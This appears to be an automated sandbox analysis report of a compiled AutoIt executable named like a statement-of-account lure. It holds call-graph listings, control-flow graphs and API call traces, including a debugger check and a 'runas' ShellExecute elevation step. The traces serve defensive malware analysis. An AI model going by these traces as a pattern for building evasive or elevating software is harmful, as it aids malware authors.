96246 9364cf 96221->96246 96224 93d7f7 48 API calls 96225 934b32 96224->96225 96252 9349fb 96225->96252 96227 934b43 Mailbox 96227->96209 96228 9361a6 48 API calls 96231 934b3d _wcscat Mailbox __NMSG_WRITE 96228->96231 96229 93ce19 48 API calls 96229->96231 96230 9364cf 48 API calls 96230->96231 96231->96227 96231->96228 96231->96229 96231->96230 96232->96211 96266 95f8a0 96233->96266 96236 93ce19 48 API calls 96237 9353a7 96236->96237 96268 93660f 96237->96268 96239 9353b1 Mailbox 96239->96217 96241 933649 __ftell_nolock 96240->96241 96275 93366c GetFullPathNameW 96241->96275 96243 93365a 96244 936a63 48 API calls 96243->96244 96245 933669 96244->96245 96245->96220 96247 93651b 96246->96247 96251 9364dd _memcpy_s 96246->96251 96249 94f4ea 48 API calls 96247->96249 96248 94f4ea 48 API calls 96250 934b29 96248->96250 96249->96251 96250->96224 96251->96248 96277 93bcce 96252->96277 96255 9a41cc RegQueryValueExW 96257 9a4246 RegCloseKey 96255->96257 96258 9a41e5 96255->96258 96256 934a2b 96256->96231 96259 94f4ea 48 API calls 96258->96259 96260 9a41fe 96259->96260 96261 9347b7 48 API calls 96260->96261 96262 9a4208 RegQueryValueExW 96261->96262 96263 9a423b 96262->96263 96264 9a4224 96262->96264 96263->96257 96265 936a63 48 API calls 96264->96265 96265->96263 96267 935381 GetModuleFileNameW 96266->96267 96267->96236 96269 95f8a0 __ftell_nolock 96268->96269 96270 93661c GetFullPathNameW 96269->96270 96271 936a63 48 API calls 96270->96271 96272 936643 96271->96272 96273 936571 48 API calls 96272->96273 96274 93664f 96273->96274 96274->96239 96276 93368a 96275->96276 96276->96243 96278 934a0a RegOpenKeyExW 96277->96278 96279 93bce8 96277->96279 96278->96255 96278->96256 96280 94f4ea 48 API calls 96279->96280 96281 93bcf2 96280->96281 96282 94ee75 48 API calls 96281->96282 96282->96278 96283 955dfd 96284 955e09 _flsall 96283->96284 96320 957eeb GetStartupInfoW 96284->96320 96286 955e0e 96322 959ca7 GetProcessHeap 96286->96322 96288 955e66 96289 955e71 96288->96289 96407 955f4d 47 API calls 3 library calls 96288->96407 96323 957b47 96289->96323 96292 955e77 96293 955e82 __RTC_Initialize 96292->96293 96408 955f4d 47 API calls 3 library calls 96292->96408 96344 95acb3 96293->96344 96296 955e91 96297 955e9d GetCommandLineW 96296->96297 96409 955f4d 47 API calls 3 library calls 96296->96409 96363 962e7d GetEnvironmentStringsW 96297->96363 96300 955e9c 96300->96297 96304 955ec2 96376 962cb4 96304->96376 96307 955ec8 96308 955ed3 96307->96308 96411 95115b 47 API calls 3 library calls 96307->96411 96390 951195 96308->96390 96311 955edb 96312 955ee6 __wwincmdln 96311->96312 96412 95115b 47 API calls 3 library calls 96311->96412 96394 933a0f 96312->96394 96315 955efa 96316 955f09 96315->96316 96413 9513f1 47 API calls _doexit 96315->96413 96414 951186 47 API calls _doexit 96316->96414 96319 955f0e _flsall 96321 957f01 96320->96321 96321->96286 96322->96288 96415 95123a 30 API calls 2 library calls 96323->96415 96325 957b4c 96416 957e23 InitializeCriticalSectionAndSpinCount 96325->96416 96327 957b51 96328 957b55 96327->96328 96418 957e6d TlsAlloc 96327->96418 96417 957bbd 50 API calls 2 library calls 96328->96417 96331 957b67 96331->96328 96333 957b72 96331->96333 96332 957b5a 96332->96292 96419 956986 96333->96419 96336 957bb4 96427 957bbd 50 API calls 2 library calls 96336->96427 96339 957b93 96339->96336 96341 957b99 96339->96341 96340 957bb9 96340->96292 96426 957a94 47 API calls 4 library calls 96341->96426 96343 957ba1 GetCurrentThreadId 96343->96292 96345 95acbf _flsall 96344->96345 96346 957cf4 __lock 47 API calls 96345->96346 96347 95acc6 96346->96347 96348 956986 __calloc_crt 47 API calls 96347->96348 96350 95acd7 96348->96350 96349 95ace2 _flsall @_EH4_CallFilterFunc@8 96349->96296 96350->96349 96351 95ad42 GetStartupInfoW 96350->96351 96358 95ae80 96351->96358 96360 95ad57 96351->96360 96352 95af44 96436 95af58 RtlLeaveCriticalSection _doexit 96352->96436 96354 95aec9 GetStdHandle 96354->96358 96355 956986 __calloc_crt 47 API calls 96355->96360 96356 95aedb GetFileType 96356->96358 96357 95ada5 96357->96358 96361 95ade5 InitializeCriticalSectionAndSpinCount 96357->96361 96362 95add7 GetFileType 96357->96362 96358->96352 96358->96354 96358->96356 96359 95af08 InitializeCriticalSectionAndSpinCount 96358->96359 96359->96358 96360->96355 96360->96357 96360->96358 96361->96357 96362->96357 96362->96361 96364 955ead 96363->96364 96365 962e8e 96363->96365 96370 962a7b GetModuleFileNameW 96364->96370 96437 9569d0 47 API calls std::exception::_Copy_str 96365->96437 96368 962eca FreeEnvironmentStringsW 96368->96364 96369 962eb4 _memcpy_s 96369->96368 96371 962aaf _wparse_cmdline 96370->96371 96372 955eb7 96371->96372 96373 962ae9 96371->96373 96372->96304 96410 95115b 47 API calls 3 library calls 96372->96410 96438 9569d0 47 API calls std::exception::_Copy_str 96373->96438 96375 962aef _wparse_cmdline 96375->96372 96377 962ccd __NMSG_WRITE 96376->96377 96381 962cc5 96376->96381 96378 956986 __calloc_crt 47 API calls 96377->96378 96386 962cf6 __NMSG_WRITE 96378->96386 96379 962d4d 96380 951c9d _free 47 API calls 96379->96380 96380->96381 96381->96307 96382 956986 __calloc_crt 47 API calls 96382->96386 96383 962d72 96384 951c9d _free 47 API calls 96383->96384 96384->96381 96386->96379 96386->96381 96386->96382 96386->96383 96387 962d89 96386->96387 96439 962567 47 API calls 2 library calls 96386->96439 96440 956e20 IsProcessorFeaturePresent 96387->96440 96389 962d95 96389->96307 96391 9511a1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 96390->96391 96393 9511e0 __IsNonwritableInCurrentImage 96391->96393 96455 950f0a 52 API calls __cinit 96391->96455 96393->96311 96395 9a1ebf 96394->96395 96396 933a29 96394->96396 96397 933a63 74A3C8D0 96396->96397 96456 951405 96397->96456 96401 933a8f 96468 933adb SystemParametersInfoW SystemParametersInfoW 96401->96468 96403 933a9b 96469 933d19 96403->96469 96405 933aa3 SystemParametersInfoW 96406 933ac8 96405->96406 96406->96315 96407->96289 96408->96293 96409->96300 96413->96316 96414->96319 96415->96325 96416->96327 96417->96332 96418->96331 96421 95698d 96419->96421 96422 9569ca 96421->96422 96423 9569ab Sleep 96421->96423 96428 9630aa 96421->96428 96422->96336 96425 957ec9 TlsSetValue 96422->96425 96424 9569c2 96423->96424 96424->96421 96424->96422 96425->96339 96426->96343 96427->96340 96429 9630b5 96428->96429 96434 9630d0 __calloc_impl 96428->96434 96430 9630c1 96429->96430 96429->96434 96435 957c0e 47 API calls __getptd_noexit 96430->96435 96432 9630e0 RtlAllocateHeap 96433 9630c6 96432->96433 96432->96434 96433->96421 96434->96432 96434->96433 96435->96433 96436->96349 96437->96369 96438->96375 96439->96386 96441 956e2b 96440->96441 96446 956cb5 96441->96446 96445 956e46 96445->96389 96447 956ccf _memset __call_reportfault 96446->96447 96448 956cef IsDebuggerPresent 96447->96448 96454 9581ac SetUnhandledExceptionFilter UnhandledExceptionFilter 96448->96454 96450 95a70c __NMSG_WRITE 6 API calls 96452 956dd6 96450->96452 96451 956db3 __call_reportfault 96451->96450 96453 958197 GetCurrentProcess TerminateProcess 96452->96453 96453->96445 96454->96451 96455->96393 96457 957cf4 __lock 47 API calls 96456->96457 96458 951410 96457->96458 96521 957e58 RtlLeaveCriticalSection 96458->96521 96460 933a88 96461 95146d 96460->96461 96462 951477 96461->96462 96463 951491 96461->96463 96462->96463 96522 957c0e 47 API calls __getptd_noexit 96462->96522 96463->96401 96465 951481 96523 956e10 8 API calls __Wcsftime_l 96465->96523 96467 95148c 96467->96401 96468->96403 96470 933d26 __ftell_nolock 96469->96470 96471 93d7f7 48 API calls 96470->96471 96472 933d31 GetCurrentDirectoryW 96471->96472 96524 9361ca 96472->96524 96474 933d57 IsDebuggerPresent 96475 933d65 96474->96475 96476 9a1cc1 MessageBoxA 96474->96476 96477 933e3a 96475->96477 96479 9a1cd9 96475->96479 96480 933d82 96475->96480 96476->96479 96478 933e41 SetCurrentDirectoryW 96477->96478 96483 933e4e Mailbox 96478->96483 96638 94c682 48 API calls 96479->96638 96598 9340e5 96480->96598 96483->96405 96484 9a1ce9 96489 9a1cff SetCurrentDirectoryW 96484->96489 96489->96483 96521->96460 96522->96465 96523->96467 96640 94e99b 96524->96640 96528 9361eb 96529 935374 50 API calls 96528->96529 96530 9361ff 96529->96530 96531 93ce19 48 API calls 96530->96531 96532 93620c 96531->96532 96657 9339db 96532->96657 96534 936216 Mailbox 96535 936eed 48 API calls 96534->96535 96536 93622b 96535->96536 96669 939048 96536->96669 96539 93ce19 48 API calls 96540 936244 96539->96540 96541 93d6e9 55 API calls 96540->96541 96542 936254 Mailbox 96541->96542 96543 93ce19 48 API calls 96542->96543 96544 93627c 96543->96544 96545 93d6e9 55 API calls 96544->96545 96546 93628f Mailbox 96545->96546 96547 93ce19 48 API calls 96546->96547 96548 9362a0 96547->96548 96549 93d645 53 API calls 96548->96549 96550 9362b2 Mailbox 96549->96550 96551 93d7f7 48 API calls 96550->96551 96552 9362c5 96551->96552 96672 9363fc 96552->96672 96556 9362df 96557 9a1c08 96556->96557 96558 9362e9 96556->96558 96559 9363fc 48 API calls 96557->96559 96560 950fa7 _W_store_winword 59 API calls 96558->96560 96561 9a1c1c 96559->96561 96562 9362f4 96560->96562 96564 9363fc 48 API calls 96561->96564 96562->96561 96563 9362fe 96562->96563 96565 950fa7 _W_store_winword 59 API calls 96563->96565 96566 9a1c38 96564->96566 96567 936309 96565->96567 96570 935374 50 API calls 96566->96570 96567->96566 96568 936313 96567->96568 96569 950fa7 _W_store_winword 59 API calls 96568->96569 96571 93631e 96569->96571 96572 9a1c5d 96570->96572 96573 93635f 96571->96573 96575 9a1c86 96571->96575 96578 9363fc 48 API calls 96571->96578 96574 9363fc 48 API calls 96572->96574 96573->96575 96576 93636c 96573->96576 96577 9a1c69 96574->96577 96579 936eed 48 API calls 96575->96579 96583 94c050 48 API calls 96576->96583 96580 936eed 48 API calls 96577->96580 96581 936342 96578->96581 96582 9a1ca8 96579->96582 96584 9a1c77 96580->96584 96586 936eed 48 API calls 96581->96586 96587 9363fc 48 API calls 96582->96587 96588 936384 96583->96588 96585 9363fc 48 API calls 96584->96585 96585->96575 96589 936350 96586->96589 96590 9a1cb5 96587->96590 96591 941b90 48 API calls 96588->96591 96592 9363fc 48 API calls 96589->96592 96590->96590 96595 936394 96591->96595 96592->96573 96593 941b90 48 API calls 96593->96595 96595->96593 96596 9363fc 48 API calls 96595->96596 96597 9363d6 Mailbox 96595->96597 96688 936b68 48 API calls 96595->96688 96596->96595 96597->96474 96599 9340f2 __ftell_nolock 96598->96599 96600 93410b 96599->96600 96605 9a370e _memset 96599->96605 96601 93660f 49 API calls 96600->96601 96602 934114 96601->96602 96730 9340a7 96602->96730 96608 936a63 48 API calls 96605->96608 96610 9a378e 96608->96610 96610->96610 96638->96484 96641 93d7f7 48 API calls 96640->96641 96642 9361db 96641->96642 96643 936009 96642->96643 96644 936016 __ftell_nolock 96643->96644 96645 936a63 48 API calls 96644->96645 96651 93617c Mailbox 96644->96651 96647 936048 96645->96647 96656 93607e Mailbox 96647->96656 96689 9361a6 96647->96689 96648 9361a6 48 API calls 96648->96656 96649 93614f 96650 93ce19 48 API calls 96649->96650 96649->96651 96653 936170 96650->96653 96651->96528 96652 93ce19 48 API calls 96652->96656 96654 9364cf 48 API calls 96653->96654 96654->96651 96655 9364cf 48 API calls 96655->96656 96656->96648 96656->96649 96656->96651 96656->96652 96656->96655 96658 9341a9 136 API calls 96657->96658 96659 9339fe 96658->96659 96660 933a06 96659->96660 96692 97c396 96659->96692 96660->96534 96663 934252 84 API calls 96665 9a2ff0 96663->96665 96664 951c9d _free 47 API calls 96666 9a2ffd 96664->96666 96665->96664 96667 934252 84 API calls 96666->96667 96668 9a3006 96667->96668 96668->96668 96670 94f4ea 48 API calls 96669->96670 96671 936237 96670->96671 96671->96539 96673 936406 96672->96673 96674 93641f 96672->96674 96675 936eed 48 API calls 96673->96675 96676 936a63 48 API calls 96674->96676 96677 9362d1 96675->96677 96676->96677 96678 950fa7 96677->96678 96679 950fb3 96678->96679 96680 951028 96678->96680 96687 950fd8 96679->96687 96727 957c0e 47 API calls __getptd_noexit 96679->96727 96729 95103a 59 API calls 4 library calls 96680->96729 96683 951035 96683->96556 96684 950fbf 96728 956e10 8 API calls __Wcsftime_l 96684->96728 96686 950fca 96686->96556 96687->96556 96688->96595 96690 93bdfa 48 API calls 96689->96690 96691 9361b1 96690->96691 96691->96647 96693 934517 83 API calls 96692->96693 96694 97c405 96693->96694 96695 97c56d 94 API calls 96694->96695 96696 97c417 96695->96696 96697 9344ed 64 API calls 96696->96697 96724 97c41b 96696->96724 96698 97c432 96697->96698 96699 9344ed 64 API calls 96698->96699 96700 97c442 96699->96700 96701 9344ed 64 API calls 96700->96701 96702 97c45d 96701->96702 96703 9344ed 64 API calls 96702->96703 96704 97c478 96703->96704 96705 934517 83 API calls 96704->96705 96706 97c48f 96705->96706 96707 95395c std::exception::_Copy_str 47 API calls 96706->96707 96708 97c496 96707->96708 96709 95395c std::exception::_Copy_str 47 API calls 96708->96709 96710 97c4a0 96709->96710 96711 9344ed 64 API calls 96710->96711 96712 97c4b4 96711->96712 96713 97bf5a GetSystemTimeAsFileTime 96712->96713 96714 97c4c7 96713->96714 96715 97c4f1 96714->96715 96716 97c4dc 96714->96716 96718 97c4f7 96715->96718 96719 97c556 96715->96719 96717 951c9d _free 47 API calls 96716->96717 96722 97c4e2 96717->96722 96720 97b965 118 API calls 96718->96720 96721 951c9d _free 47 API calls 96719->96721 96723 97c54e 96720->96723 96721->96724 96725 951c9d _free 47 API calls 96722->96725 96726 951c9d _free 47 API calls 96723->96726 96724->96663 96724->96665 96725->96724 96726->96724 96727->96684 96728->96686 96729->96683 96731 95f8a0 __ftell_nolock 96730->96731 96732 9340b4 GetLongPathNameW 96731->96732 96733 936a63 48 API calls 96732->96733 96734 9340dc 96733->96734 96735 9349a0 96734->96735 96736 93d7f7 48 API calls 96735->96736 96737 9349b2 96736->96737 96738 93660f 49 API calls 96737->96738 96739 9349bd 96738->96739 96740 9349c8 96739->96740 96745 9a2e35 96739->96745

                                      Executed Functions

                                      Function 0095B043 Relevance: 21.5, APIs: 14, Instructions: 537COMMONLIBRARYCODE
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 957 95b043-95b080 call 95f8a0 960 95b082-95b084 957->960 961 95b089-95b08b 957->961 962 95b860-95b86c call 95a70c 960->962 963 95b08d-95b0a7 call 957bda call 957c0e call 956e10 961->963 964 95b0ac-95b0d9 961->964 963->962 966 95b0e0-95b0e7 964->966 967 95b0db-95b0de 964->967 971 95b105 966->971 972 95b0e9-95b100 call 957bda call 957c0e call 956e10 966->972 967->966 970 95b10b-95b110 967->970 975 95b112-95b11c call 95f82f 970->975 976 95b11f-95b12d call 963bf2 970->976 971->970 1000 95b851-95b854 972->1000 975->976 987 95b133-95b145 976->987 988 95b44b-95b45d 976->988 987->988 990 95b14b-95b183 call 957a0d GetConsoleMode 987->990 991 95b463-95b473 988->991 992 95b7b8-95b7d5 WriteFile 988->992 990->988 1013 95b189-95b18f 990->1013 997 95b479-95b484 991->997 998 95b55a-95b55f 991->998 994 95b7d7-95b7df 992->994 995 95b7e1-95b7e7 GetLastError 992->995 1001 95b7e9 994->1001 995->1001 1005 95b81b-95b833 997->1005 1006 95b48a-95b49a 997->1006 1002 95b565-95b56e 998->1002 1003 95b663-95b66e 998->1003 1012 95b85e-95b85f 1000->1012 1010 95b7ef-95b7f1 1001->1010 1002->1005 1011 95b574 1002->1011 1003->1005 1009 95b674 1003->1009 1007 95b835-95b838 1005->1007 1008 95b83e-95b84e call 957c0e call 957bda 1005->1008 1014 95b4a0-95b4a3 1006->1014 1007->1008 1015 95b83a-95b83c 1007->1015 1008->1000 1016 95b67e-95b693 1009->1016 1018 95b856-95b85c 1010->1018 1019 95b7f3-95b7f5 1010->1019 1020 95b57e-95b595 1011->1020 1012->962 1021 95b191-95b193 1013->1021 1022 95b199-95b1bc GetConsoleCP 1013->1022 1023 95b4a5-95b4be 1014->1023 1024 95b4e9-95b520 WriteFile 1014->1024 1015->1012 1028 95b699-95b69b 1016->1028 1018->1012 1019->1005 1030 95b7f7-95b7fc 1019->1030 1031 95b59b-95b59e 1020->1031 1021->988 1021->1022 1032 95b440-95b446 1022->1032 1033 95b1c2-95b1ca 1022->1033 1025 95b4c0-95b4ca 1023->1025 1026 95b4cb-95b4e7 1023->1026 1024->995 1027 95b526-95b538 1024->1027 1025->1026 1026->1014 1026->1024 1027->1010 1035 95b53e-95b54f 1027->1035 1036 95b69d-95b6b3 1028->1036 1037 95b6d8-95b719 WideCharToMultiByte 1028->1037 1039 95b812-95b819 call 957bed 1030->1039 1040 95b7fe-95b810 call 957c0e call 957bda 1030->1040 1041 95b5a0-95b5b6 1031->1041 1042 95b5de-95b627 WriteFile 1031->1042 1032->1019 1034 95b1d4-95b1d6 1033->1034 1043 95b1dc-95b1fe 1034->1043 1044 95b36b-95b36e 1034->1044 1035->1006 1045 95b555 1035->1045 1046 95b6b5-95b6c4 1036->1046 1047 95b6c7-95b6d6 1036->1047 1037->995 1049 95b71f-95b721 1037->1049 1039->1000 1040->1000 1051 95b5cd-95b5dc 1041->1051 1052 95b5b8-95b5ca 1041->1052 1042->995 1054 95b62d-95b645 1042->1054 1057 95b217-95b223 call 951688 1043->1057 1058 95b200-95b215 1043->1058 1059 95b375-95b3a2 1044->1059 1060 95b370-95b373 1044->1060 1045->1010 1046->1047 1047->1028 1047->1037 1061 95b727-95b75a WriteFile 1049->1061 1051->1031 1051->1042 1052->1051 1054->1010 1056 95b64b-95b658 1054->1056 1056->1020 1063 95b65e 1056->1063 1078 95b225-95b239 1057->1078 1079 95b269-95b26b 1057->1079 1064 95b271-95b283 call 9640f7 1058->1064 1066 95b3a8-95b3ab 1059->1066 1060->1059 1060->1066 1067 95b75c-95b776 1061->1067 1068 95b77a-95b78e GetLastError 1061->1068 1063->1010 1088 95b435-95b43b 1064->1088 1089 95b289 1064->1089 1071 95b3b2-95b3c5 call 965884 1066->1071 1072 95b3ad-95b3b0 1066->1072 1067->1061 1074 95b778 1067->1074 1076 95b794-95b796 1068->1076 1071->995 1092 95b3cb-95b3d5 1071->1092 1072->1071 1080 95b407-95b40a 1072->1080 1074->1076 1076->1001 1077 95b798-95b7b0 1076->1077 1077->1016 1083 95b7b6 1077->1083 1085 95b412-95b42d 1078->1085 1086 95b23f-95b254 call 9640f7 1078->1086 1079->1064 1080->1034 1084 95b410 1080->1084 1083->1010 1084->1088 1085->1088 1086->1088 1099 95b25a-95b267 1086->1099 1088->1001 1090 95b28f-95b2c4 WideCharToMultiByte 1089->1090 1090->1088 1095 95b2ca-95b2f0 WriteFile 1090->1095 1093 95b3d7-95b3ee call 965884 1092->1093 1094 95b3fb-95b401 1092->1094 1093->995 1102 95b3f4-95b3f5 1093->1102 1094->1080 1095->995 1098 95b2f6-95b30e 1095->1098 1098->1088 1101 95b314-95b31b 1098->1101 1099->1090 1101->1094 1103 95b321-95b34c WriteFile 1101->1103 1102->1094 1103->995 1104 95b352-95b359 1103->1104 1104->1088 1105 95b35f-95b366 1104->1105 1105->1094
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 055cdb899ce90b9075861d494802ff78cc9e30a08eefd9eba8b1f31beb8b1b4c
                                      • Instruction ID: c3747819ece5d1e0e2f32fee4d4501d67f64e0ffd8a9c01548cea2f0688e979e
                                      • Opcode Fuzzy Hash: 055cdb899ce90b9075861d494802ff78cc9e30a08eefd9eba8b1f31beb8b1b4c
                                      • Instruction Fuzzy Hash: 31326E75B022288FDB24CF55DC816E9B7B9FF4A311F1841D9E80AA7A91D7309E84CF52
                                      Function 00933D19 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151windowCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00933AA3,?), ref: 00933D45
                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,00933AA3,?), ref: 00933D57
                                      • GetFullPathNameW.KERNEL32(00007FFF,?,?,009F1148,009F1130,?,?,?,?,00933AA3,?), ref: 00933DC8
                                        • Part of subcall function 00936430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00933DEE,009F1148,?,?,?,?,?,00933AA3,?), ref: 00936471
                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,00933AA3,?), ref: 00933E48
                                      • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,009E28F4,00000010), ref: 009A1CCE
                                      • SetCurrentDirectoryW.KERNEL32(?,009F1148,?,?,?,?,?,00933AA3,?), ref: 009A1D06
                                      • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,009CDAB4,009F1148,?,?,?,?,?,00933AA3,?), ref: 009A1D89
                                      • ShellExecuteW.SHELL32(00000000,?,?,?,?,00933AA3), ref: 009A1D90
                                        • Part of subcall function 00933E6E: GetSysColorBrush.USER32(0000000F), ref: 00933E79
                                        • Part of subcall function 00933E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00933E88
                                        • Part of subcall function 00933E6E: LoadIconW.USER32(00000063), ref: 00933E9E
                                        • Part of subcall function 00933E6E: LoadIconW.USER32(000000A4), ref: 00933EB0
                                        • Part of subcall function 00933E6E: LoadIconW.USER32(000000A2), ref: 00933EC2
                                        • Part of subcall function 00933E6E: RegisterClassExW.USER32(?), ref: 00933F30
                                        • Part of subcall function 009336B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 009336E6
                                        • Part of subcall function 009336B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00933707
                                        • Part of subcall function 009336B8: ShowWindow.USER32(00000000,?,?,?,?,00933AA3,?), ref: 0093371B
                                        • Part of subcall function 009336B8: ShowWindow.USER32(00000000,?,?,?,?,00933AA3,?), ref: 00933724
                                        • Part of subcall function 00934FFC: _memset.LIBCMT ref: 00935022
                                        • Part of subcall function 00934FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 009350CB
                                      Strings
                                      • runas, xrefs: 009A1D84
                                      • This is a third-party compiled AutoIt script., xrefs: 009A1CC8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                      • String ID: This is a third-party compiled AutoIt script.$runas
                                      • API String ID: 438480954-3287110873
                                      • Opcode ID: 2de1e11d7729c5eaf1cb94da4702fe672dcf21831cd98aa4636cef8b1017949b
                                      • Instruction ID: f63cadf3ec60bdf399181345809fd85b492afd703f422ffa499dcaa436e8edbd
                                      • Opcode Fuzzy Hash: 2de1e11d7729c5eaf1cb94da4702fe672dcf21831cd98aa4636cef8b1017949b
                                      • Instruction Fuzzy Hash: 28511530A4C248FBCB21ABF1DC41FFE7BB99B8A714F008124F241A21A2DA744A45DF61
                                      Function 00933742 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151timewindowregistryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1173 933742-933762 1175 9337c2-9337c4 1173->1175 1176 933764-933767 1173->1176 1175->1176 1177 9337c6 1175->1177 1178 933769-933770 1176->1178 1179 9337c8 1176->1179 1180 9337ab-9337b3 NtdllDefWindowProc_W 1177->1180 1183 933776-93377b 1178->1183 1184 93382c-933834 PostQuitMessage 1178->1184 1181 9a1e00-9a1e2e call 932ff6 call 94e312 1179->1181 1182 9337ce-9337d1 1179->1182 1185 9337b9-9337bf 1180->1185 1220 9a1e33-9a1e3a 1181->1220 1186 9337d3-9337d4 1182->1186 1187 9337f6-93381d SetTimer RegisterClipboardFormatW 1182->1187 1189 9a1e88-9a1e9c call 974ddd 1183->1189 1190 933781-933783 1183->1190 1191 9337f2-9337f4 1184->1191 1192 9a1da3-9a1da6 1186->1192 1193 9337da-9337ed KillTimer call 933847 call 93390f 1186->1193 1187->1191 1195 93381f-93382a CreatePopupMenu 1187->1195 1189->1191 1215 9a1ea2 1189->1215 1196 933836-933840 call 94eb83 1190->1196 1197 933789-93378e 1190->1197 1191->1185 1199 9a1da8-9a1daa 1192->1199 1200 9a1ddc-9a1dfb MoveWindow 1192->1200 1193->1191 1195->1191 1207 933845 1196->1207 1203 9a1e6d-9a1e74 1197->1203 1204 933794-933799 1197->1204 1208 9a1dcb-9a1dd7 SetFocus 1199->1208 1209 9a1dac-9a1daf 1199->1209 1200->1191 1203->1180 1211 9a1e7a-9a1e83 call 96a5f3 1203->1211 1213 9a1e58-9a1e68 call 9755bd 1204->1213 1214 93379f-9337a5 1204->1214 1207->1191 1208->1191 1209->1214 1216 9a1db5-9a1dc6 call 932ff6 1209->1216 1211->1180 1213->1191 1214->1180 1214->1220 1215->1180 1216->1191 1220->1180 1221 9a1e40-9a1e53 call 933847 call 934ffc 1220->1221 1221->1180
                                      APIs
                                      • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 009337B3
                                      • KillTimer.USER32(?,00000001), ref: 009337DD
                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00933800
                                      • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 0093380B
                                      • CreatePopupMenu.USER32 ref: 0093381F
                                      • PostQuitMessage.USER32(00000000), ref: 0093382E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
                                      • String ID: TaskbarCreated
                                      • API String ID: 157504867-2362178303
                                      • Opcode ID: dedd48758339a22574e95151653bbc778a6c0fc70572723989a79bd85301d12b
                                      • Instruction ID: 1cd30f453b3cb0fe3304ad58f7a774dba372abfce079ac9ff2b841a165904eae
                                      • Opcode Fuzzy Hash: dedd48758339a22574e95151653bbc778a6c0fc70572723989a79bd85301d12b
                                      • Instruction Fuzzy Hash: FE414DF52A824AE7DB246F28DD4EF7A3799F740300F048525F607D21A1DB649D50EFA2
                                      Function 0094DDC0 Relevance: 10.7, APIs: 7, Instructions: 175COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
